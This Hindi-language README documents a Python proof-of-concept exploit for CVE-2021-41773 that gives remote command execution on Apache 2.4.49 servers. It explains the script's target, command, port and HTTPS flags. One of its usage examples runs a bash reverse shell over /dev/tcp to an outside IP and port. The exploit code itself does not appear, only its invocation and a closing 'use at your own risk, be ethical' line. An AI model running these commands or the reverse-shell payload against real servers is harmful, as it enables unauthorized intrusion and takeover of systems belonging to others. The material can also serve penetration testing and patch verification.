
CVE-2021-41773 के लिए Python-आधारित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, कस्टम कमांड और पोर्ट विकल्पों के साथ Apache 2.4.49 सर्वर पर रिमोट कोड निष्पादन सक्षम करता है।
CVE-2021-41773 के लिए PoC क्योंकि मुझे अति-जटिल एक्सप्लॉइट मिले और यह सीधे रिमोट कोड निष्पादन तक जाता है।
बस कमजोर Apache 2.4.49 सर्वर चलाने वाले IP पते को -i के साथ और वांछित सिस्टम कमांड को -c के साथ निर्दिष्ट करें। यदि वेब सर्वर पोर्ट 80 पर नहीं चल रहा है तो हम इसे -p से निर्दिष्ट कर सकते हैं और यदि वेब सर्वर HTTPs का उपयोग कर रहा है तो आपको --use-https फ्लैग का उपयोग करना होगा।
$ python3 CVE-2021-41773.py -i 10.10.10.10 -c 'id'
$ python3 CVE-2021-41773.py -i example.com -p 8080 -c '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"'
$ python3 CVE-2021-41773.py -i 20.20.20.20 -p 443 --use-https -c 'whoami'
इसे अपनी जिम्मेदारी पर उपयोग करें (:
नैतिक बनें।